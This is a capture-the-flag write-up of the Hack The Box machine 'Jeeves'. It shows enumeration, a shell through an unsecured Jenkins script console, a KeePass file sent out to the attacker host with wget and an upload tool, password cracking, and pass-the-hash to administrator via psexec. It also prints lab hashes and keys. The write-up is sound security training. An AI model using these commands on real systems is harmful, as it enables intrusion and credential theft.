Overview

The machine starts by enumerating port 50000 with a larger wordlist to discover a Jenkins instance running version 2.87 with an unsecured authorization strategy, allowing unauthenticated access to the Groovy script console to get a shell as kohsuke, then enumerating user documents reveals a KeePass database which when cracked yields an NTLM hash for the administrator account, using that hash for pass-the-hash via SMB grants full system access, and the root flag is hidden inside an NTFS alternate data stream on the administrator desktop.

Enumeration

start with nmap scan

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves]                                                                                                                                                                                                                                                   13:22:35 [67/67]
└──╼ [★]$ nmap -sC -sV -vv -oA init 10.129.18.97
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-18 13:21 PDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:21
Completed NSE at 13:21, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:21
Completed NSE at 13:21, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:21
Completed NSE at 13:21, 0.00s elapsed
Initiating Ping Scan at 13:21
Scanning 10.129.18.97 [2 ports]
Completed Ping Scan at 13:21, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:21
Completed Parallel DNS resolution of 1 host. at 13:21, 0.10s elapsed
Initiating Connect Scan at 13:21
Scanning 10.129.18.97 [1000 ports]
Discovered open port 80/tcp on 10.129.18.97
Discovered open port 445/tcp on 10.129.18.97
Discovered open port 135/tcp on 10.129.18.97
Discovered open port 50000/tcp on 10.129.18.97
Completed Connect Scan at 13:21, 8.42s elapsed (1000 total ports)
Initiating Service scan at 13:21
Scanning 4 services on 10.129.18.97
Completed Service scan at 13:21, 6.87s elapsed (4 services on 1 host)
NSE: Script scanning 10.129.18.97.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:21
NSE Timing: About 99.82% done; ETC: 13:22 (0:00:00 remaining)
Completed NSE at 13:22, 40.09s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:22
Completed NSE at 13:22, 0.74s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:22
Completed NSE at 13:22, 0.00s elapsed
Nmap scan report for 10.129.18.97
Host is up, received syn-ack (0.095s latency).
Scanned at 2026-06-18 13:21:39 PDT for 56s
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp    open  http         syn-ack Microsoft IIS httpd 10.0
| _http-title: Ask Jeeves
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
| _ Potentially risky methods: TRACE
| _http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         syn-ack Jetty 9.4.z-SNAPSHOT
| _http-title: Error 404 Not Found
| _http-server-header: Jetty(9.4.z-SNAPSHOT)
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 35503/tcp): CLEAN (Timeout)
| Check 2 (port 56934/tcp): CLEAN (Timeout)
| Check 3 (port 10917/udp): CLEAN (Timeout)
| Check 4 (port 2115/udp): CLEAN (Timeout)
| _ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2026-06-19T01:22:00
| _ start_date: 2026-06-19T01:18:12
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
| _ message_signing: disabled (dangerous, but default)
| _clock-skew: mean: 4h59m59s, deviation: 0s, median: 4h59m58s
| smb2-security-mode:
| 3:1:1:
| _ Message signing enabled but not required

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:22
Completed NSE at 13:22, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:22
Completed NSE at 13:22, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:22
Completed NSE at 13:22, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.05 seconds

we got 4 open ports SMB, Netbios, HTTP on two different ports one is running IIS and the other is hosting jetty App there is no virtual hosting

Port 80

port 80 looks like a search engine

any search attempt redirects to that error.html which is a static page always throwing the same error no matter what

fuzzing for any directories came back empty

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves]
└──╼ [★]$ ffuf -u http://10.129.18.97/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.18.97/FUZZ
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/Web-Content/raft-small-words.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.                       [Status: 200, Size: 503, Words: 38, Lines: 17, Duration: 308ms]
:: Progress: [43007/43007] :: Job [1/1] :: 186 req/sec :: Duration: [0:02:38] :: Errors: 0 ::

port 50000 leaks Jetty version but shows 404 for the root /

fuzzing both ports was empty also

bash


┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves]
└──╼ [★]$ ffuf -u http://10.129.18.97/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -e .html

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.18.97/FUZZ
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/Web-Content/raft-small-words.txt
 :: Extensions       : .html
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

index.html              [Status: 200, Size: 503, Words: 38, Lines: 17, Duration: 145ms]
error.html              [Status: 200, Size: 50, Words: 4, Lines: 2, Duration: 134ms]
.                       [Status: 200, Size: 503, Words: 38, Lines: 17, Duration: 137ms]
Error.html              [Status: 200, Size: 50, Words: 4, Lines: 2, Duration: 130ms]
Index.html              [Status: 200, Size: 503, Words: 38, Lines: 17, Duration: 148ms]
[WARN] Caught keyboard interrupt (Ctrl-C)


┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves]
└──╼ [★]$ ffuf -u http://10.129.18.97:50000/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.18.97:50000/FUZZ
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/Web-Content/raft-small-words.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

:: Progress: [43007/43007] :: Job [1/1] :: 324 req/sec :: Duration: [0:02:02] :: Errors: 0 ::

trying for anonymous connection and Guest account in SMB was denied and disabled

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves]
└──╼ [★]$ smbclient -N -L //10.129.18.97
session setup failed: NT_STATUS_ACCESS_DENIED
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves]
└──╼ [★]$ smbclient -L //10.129.18.97 -U 'Guest'
Password for [WORKGROUP\Guest]:
session setup failed: NT_STATUS_ACCOUNT_DISABLED

refuzzing again port 50000 with a different wordlist got this /askjeeves

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves]
└──╼ [★]$ ffuf -u http://10.129.18.97:50000/FUZZ -w /opt/SecLists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.18.97:50000/FUZZ
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

askjeeves [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 111ms]
:: Progress: [220559/220559] :: Job [1/1] :: 326 req/sec :: Duration: [0:09:46] :: Errors: 0 ::

Jenkins Instance

and it is a jenkins instance

with the version being 2.87 meaning it is probably from 2017 or something there was a lot of misconfiguration and weak access control back then so we can access /script where we can run groovy script without any authentication or roles and as you can, the user running this is kohsuka

just to show you why this happen, authorization strategy shows that this instance is unsecured meaning you don't even need to login anyone can do anything so lets get a shell

Shell as Kohsuke

so we'll run the same again but using powershell -enc

hosted the shell and used a web request as the command to fetch and execute it and we got a shell as you can see

and we got the flag as you can see

bash

PS C:\Users\kohsuke\Desktop> ls


    Directory: C:\Users\kohsuke\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/3/2017 11:22 PM 32 user.txt


PS C:\Users\kohsuke\Desktop> type user.txt
e3232272596fb47950d59c4cf1e7066a
PS C:\Users\kohsuke\Desktop>

looking at the privileges you can see that we got SeImpersonatePrivileges so lets get our potato on the system

plaintext

PS C:\Users\kohsuke> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

trying to impersonate failed directly using gp

bash

PS C:\Users\kohsuke> ./gp.exe -cmd "whoami"
[*] CombaseModule: 0x140703490572288
[*] DispatchTable: 0x140703492535752
[*] UseProtseqFunction: 0x140703492038480
[*] UseProtseqFunctionParamCount: 5
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\9f3eceaa-a00b-4867-80a6-1a2519d0aae4\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000c402-0e4c-ffff-d39d-5604460f5ca6
[*] DCOM obj OXID: 0xd4f215ea108643c1
[*] DCOM obj OID: 0x50490ee2448719f9
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] UnmarshalObject: 0x80070776
[!] Failed to impersonate security context token
PS C:\Users\kohsuke>

it fails, it is probably not gonna work, either wise the machine would be too easy lets enumerate the system got this website and as we expected it is just a static pages nothing special

bash

PS C:\inetpub\wwwroot> ls


    Directory: C:\inetpub\wwwroot


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/5/2017 7:39 PM 23964 Ask-Jeeves-whatever-happened-to-32225327-270-301.jpg
-a---- 11/5/2017 9:35 PM 50 error.html
-a---- 11/5/2017 9:34 PM 503 index.html
-a---- 11/5/2017 9:08 PM 463431 jeeves.PNG
-a---- 11/5/2017 9:27 PM 3744 style.css

when we dropped into a shell we were dropped in the administrator directory but we only can see the .jenkins directory so lets get as much info as we can from here

bash

PS C:\Users\Administrator\.jenkins> ls


    Directory: C:\Users\Administrator\.jenkins


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/3/2017 10:33 PM jobs
d----- 11/3/2017 10:33 PM logs
d----- 11/3/2017 10:33 PM nodes
d----- 11/3/2017 10:44 PM plugins
d----- 12/24/2017 2:47 AM secrets
d----- 11/8/2017 8:52 AM updates
d----- 11/3/2017 10:33 PM userContent
d----- 11/3/2017 10:33 PM users
d----- 11/3/2017 10:47 PM war
d----- 11/3/2017 10:43 PM workflow-libs
-a---- 6/18/2026 10:44 PM 48 .owner
-a---- 6/18/2026 9:18 PM 1684 config.xml
-a---- 6/18/2026 9:18 PM 156 hudson.model.UpdateCenter.xml
-a---- 11/3/2017 10:43 PM 374 hudson.plugins.git.GitTool.xml
-a---- 11/3/2017 10:33 PM 1712 identity.key.enc
-a---- 11/3/2017 10:46 PM 94 jenkins.CLI.xml
              6/18/2026  10:16 PM          90405 jenkins.err.log
-a---- 11/3/2017 10:47 PM 360448 jenkins.exe
-a---- 11/3/2017 10:47 PM 331 jenkins.exe.config
-a---- 6/18/2026 9:18 PM 4 jenkins.install.InstallUtil.lastExecVersion
-a---- 11/3/2017 10:45 PM 4 jenkins.install.UpgradeWizard.state
-a---- 11/3/2017 10:46 PM 138 jenkins.model.DownloadSettings.xml
             10/25/2022  12:56 PM           3024 jenkins.out.log
-a---- 6/18/2026 9:18 PM 4 jenkins.pid
-a---- 11/3/2017 10:46 PM 169 jenkins.security.QueueItemAuthenticatorConfiguration.xml
-a---- 11/3/2017 10:46 PM 162 jenkins.security.UpdateSiteWarningsConfiguration.xml
-a---- 11/3/2017 10:47 PM 74271222 jenkins.war
-a---- 6/18/2026 9:18 PM 38573 jenkins.wrapper.log
-a---- 11/3/2017 10:49 PM 2881 jenkins.xml
-a---- 6/18/2026 9:18 PM 907 nodeMonitors.xml
-a---- 11/3/2017 10:47 PM 129 queue.xml.bak
-a---- 11/3/2017 10:33 PM 64 secret.key
-a---- 11/3/2017 10:33 PM 0 secret.key.not-so-secret

as you can see we got the master key meaning any encrypted password we can find we can decrypt using those keys

plaintext

PS C:\Users\Administrator\.jenkins\secrets> cat master.key
40e19a08d55698273e82182aae560bb78f5c99205e1b603de13e4729dfeed0bfaa9ed79557107ca7294a8a18a9bd81d60ee5610943e488bf2150dc1b06935b8f2a4f5b9370e0cb1d28249758e2b96cf2b658f2c5290f
c6a202d9a04621c79eb0d09faf3246e50998a0aaea42b76eb96186f4842e0f9c07bbbd77152afc59de16
PS C:\Users\Administrator\.jenkins\secrets> cat hudson.util.secret
??
  hf??@?A?o?R????M??*R??S?I[ci??l?????h??m\_?U??????b?{x?b?=BiiP?N?O#b?GP=??`????j?x~??%??7?Z{i?C?C?????        ?jh???`?n??F?A7??D?7$?q`?<???w^??"??!????A?be???
                                                                                                                                                                ???????{}?????
n<?G?f?{?;?B????U??@|???p?I???Qp???sfD??f=?^XD???????b^?5????\?$L??????M??J
PS C:\Users\Administrator\.jenkins\secrets>

there is also password hash for the user admin here

plaintext


PS C:\Users\Administrator\.jenkins\users\admin> cat config.xml
<?xml version='1.0' encoding='UTF-8'?>
<user>
  <fullName>admin</fullName>
  <properties>
    <jenkins.security.ApiTokenProperty>
      <apiToken>{AQAAABAAAAAwID3cR3pyZaEkaDPU25Z0S+nrU8+gDgB0JEWORJ5L1P2T+zXc/tSs2IVn1ugWLaui54D6yYki4vhXQtGhqUSeFw==}</apiToken>
    </jenkins.security.ApiTokenProperty>
    <hudson.model.MyViewsProperty>
      <views>
        <hudson.model.AllView>
          <owner class="hudson.model.MyViewsProperty" reference="../../.."/>
          <name>all</name>
          <filterExecutors>false</filterExecutors>
          <filterQueue>false</filterQueue>
          <properties class="hudson.model.View$PropertyList"/>
        </hudson.model.AllView>
      </views>
    </hudson.model.MyViewsProperty>
    <hudson.model.PaneStatusProperties>
      <collapsed/>
    </hudson.model.PaneStatusProperties>
    <hudson.search.UserSearchProperty>
      <insensitiveSearch>true</insensitiveSearch>
    </hudson.search.UserSearchProperty>
    <hudson.security.HudsonPrivateSecurityRealm_-Details>
      <passwordHash>#jbcrypt:$2a$10$QyIjgAFa7r3x8IMyqkeCluCB7ddvbR7wUn1GmFJNO2jQp2k8roehO</passwordHash>
    </hudson.security.HudsonPrivateSecurityRealm_-Details>
    <jenkins.security.LastGrantedAuthoritiesProperty>
      <roles>
        <string>authenticated</string>
      </roles>
      <timestamp>1509762882255</timestamp>
    </jenkins.security.LastGrantedAuthoritiesProperty>
  </properties>
</user>

Trying to crack the password for admin came back negative also so lets continue enumeration

KDBX File

winpeas didn't catch this but i went back to enumerate any documents in the user directory and i found this kdbx so lets move back to our system

bash

PS C:\Users\kohsuke\Documents> ls


    Directory: C:\Users\kohsuke\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/18/2017 1:43 PM 2846 CEH.kdbx

I used my gofer to send it back to the system

bash


PS C:\Users\kohsuke\Documents> wget http://10.10.16.83/gofer.exe -O go.exe
PS C:\Users\kohsuke\Documents> ./go.exe send CEH.kdbx http://10.10.16.83:8000/
  ?????????????????????  ????????????????????? ?????????????????????????????????????????????????????????????????????
  ???????????????????????? ???????????????????????????????????????????????????????????????????????????????????????????????????
  ?????????  ?????????????????????   ???????????????????????????  ??????????????????  ????????????????????????
  ?????????   ??????????????????   ???????????????????????????  ??????????????????  ????????????????????????
  ???????????????????????????????????????????????????????????????     ?????????????????????????????????  ?????????
   ?????????????????????  ????????????????????? ?????????     ?????????????????????????????????  ?????????
               File Transfer

[*] Sending CEH.kdbx (0.00 MB) -> http://10.10.16.83:8000/

         [????????????????????????????????????????????????????????????] 100.0% @ 0.04 MB/s
         [????????????????????????????????????????????????????????????] 100.0% @ 0.04 MB/s
         [????????????????????????????????????????????????????????????] 100.0% @ 0.01 MB/s
[+] Upload complete.

and as expected it is password protected so lets try to crack it

first extract the hash

plaintext

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves]
└──╼ [★]$ keepass2john CEH.kdbx | tee CEH.hash
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48

and the moon is shining i guess

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves]
└──╼ [★]$ john CEH.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1 (CEH)
1g 0:00:01:08 DONE (2026-06-18 15:17) 0.01449g/s 797.1p/s 797.1c/s 797.1C/s mwuah..moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

there is a lot of passwords for admin but this one was interesting cause it is recovered from DC and it doesn't have a URL so it isn't for a service

there is also this one that looks like an NTLM hash so lets try both

the hashes worked but the first one didn't

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves]                                                                                                    15:21:41 [33/33]
└──╼ [★]$ nxc smb 10.129.18.97 -u administrator -p S1TjAtJHKsugh9oC4VZl
SMB 10.129.18.97 445 JEEVES [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB 10.129.18.97 445 JEEVES [-] Jeeves\administrator:S1TjAtJHKsugh9oC4VZl STATUS_LOGON_FAILURE
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves]
└──╼ [★]$ nxc smb 10.129.18.97 -u administrator -H aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
SMB 10.129.18.97 445 JEEVES [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB 10.129.18.97 445 JEEVES [+] Jeeves\administrator:e0fb1fb85756c24235ff238cbe81fe00 (Pwn3d!)

Shell as Administrator

and as you can ee we can read the entire system

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves]
└──╼ [★]$ smbclient.py jeeves/administrator:@10.129.18.97 -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use C
[-] SMB SessionError: code: 0xc00000cc - STATUS_BAD_NETWORK_NAME - {Network Name Not Found} The specified share name cannot be found on the remote server.
# shares
ADMIN$
C$
IPC$
# use C$
# ls
drw-rw-rw- 0 Fri Nov 3 19:18:11 2017 $GetCurrent
drw-rw-rw- 0 Fri Nov 3 20:16:16 2017 $Recycle.Bin
-rw-rw-rw- 400228 Wed Oct 25 17:35:35 2017 bootmgr
-rw-rw-rw- 1 Wed Oct 25 17:35:34 2017 BOOTNXT
drw-rw-rw- 0 Wed Oct 25 13:42:54 2017 Documents and Settings
drw-rw-rw- 0 Sun Nov 5 18:15:36 2017 inetpub
drw-rw-rw- 0 Fri Nov 3 19:33:16 2017 Jenkins
-rw-rw-rw- 671088640 Thu Jun 18 18:18:08 2026 pagefile.sys
drw-rw-rw- 0 Wed Oct 25 17:39:24 2017 PerfLogs
drw-rw-rw- 0 Thu Oct 26 00:33:19 2017 Program Files
drw-rw-rw- 0 Fri Nov 3 19:26:13 2017 Program Files (x86)
drw-rw-rw- 0 Fri Nov 3 19:26:16 2017 ProgramData
-rw-rw-rw- 16777216 Thu Jun 18 18:18:09 2026 swapfile.sys
drw-rw-rw- 0 Thu Oct 26 07:12:08 2017 System Volume Information
drw-rw-rw- 0 Wed Nov 8 14:22:28 2017 Users
drw-rw-rw- 0 Thu Jun 18 20:22:30 2026 Windows
drw-rw-rw- 0 Wed Nov 8 06:05:20 2017 Windows10Upgrade

found this in the administrator desktop so lets get a shell

plaintext

# cat hm.txt
The flag is elsewhere.  Look deeper.

using psexec

bash

┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves]
└──╼ [★]$ psexec.py jeeves/administrator:@10.129.18.97 -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on 10.129.18.97.....
[*] Found writable share ADMIN$
[*] Uploading file HbrMylvs.exe
[*] Opening SVCManager on 10.129.18.97.....
[*] Creating service oOQZ on 10.129.18.97.....
[*] Starting service oOQZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32> cd C:\Users\Administrator

the root hash submission tells us it is on administrator desktop list hidden files shows nothing

plaintext

C:\Users\Administrator\Desktop> dir /a
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
11/03/2017  10:03 PM               282 desktop.ini
12/24/2017  03:51 AM                36 hm.txt
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               3 File(s)          1,115 bytes
               2 Dir(s)   2,438,246,400 bytes free

C:\Users\Administrator\Desktop>

so searched a little about a ways to hide files on windows till i came across this NTFS ADS (Alternate Data Streams) it is windows file system feature allows multiple set of data to be hidden inside a single file name

so when you look at a file normally you only see its main, however you can attach separate invisible data streams behind it

so for example you would have a file like this somehting.txt but there is a data stream under something.txt:secret and when you double click something.txt it'll open for you but the secret will never show, won't even get rendered on the explorer

one way to list it is to use dir /R from cmd

plaintext

C:\Users\Administrator\Desktop> dir /R
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   2,438,246,400 bytes free

we can read it using powershell with -Stream option with GC

bash

C:\Users\Administrator\Desktop> powershell -c "Get-Content .\hm.txt -Stream root.txt "
afbc5bd4b615a60648cec41c6ac92530

C:\Users\Administrator\Desktop>

or even simpler using more command from cmd

plaintext

C:\Users\Administrator\Desktop> more < hm.txt:root.txt
afbc5bd4b615a60648cec41c6ac92530

HTB: Jenkins

Overview

Enumeration

Port 80

Jenkins Instance

Shell as Kohsuke

KDBX File

Shell as Administrator

Resources

Share

Subscribe to the newsletter